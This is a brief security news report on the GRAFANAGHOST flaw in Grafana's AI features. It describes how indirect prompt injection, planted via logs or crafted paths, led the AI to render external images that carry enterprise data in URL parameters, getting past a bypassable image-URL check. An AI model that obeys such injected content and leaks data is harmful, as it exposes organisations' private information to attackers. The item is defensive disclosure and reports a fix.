GRAFANAGHOST is a vulnerability in how Grafana’s AI components process information that could allow attackers to bypass safeguards and leak enterprise data. Security researchers describe how an attacker can trigger the issue when a user interacts with an entry log, turning Grafana into an exfiltration vessel in the background with no user interaction required.
An attacker could craft a path to external resources, and when Grafana processes the prompt, data from the enterprise environment can be exposed via the rendering of an external image, with the victim’s data sent as a URL parameter. The flaw arises because a function that validates image URLs can be bypassed, enabling exfiltration via image tags, despite protections that normally block loading images from external domains.
The researchers noted that the attacker could fake the path of any Grafana‑using company by guessing data structures and where prompts are stored, and that indirect prompt injections to exfiltrate data through rendered content have been discussed before in other contexts. Grafana responded to the findings and addressed the weaknesses promptly after being notified.
According to Noma Security, the broader takeaway is that AI-driven tooling requires stronger architectural controls and runtime monitoring beyond perimeter safeguards. 7 April 2026.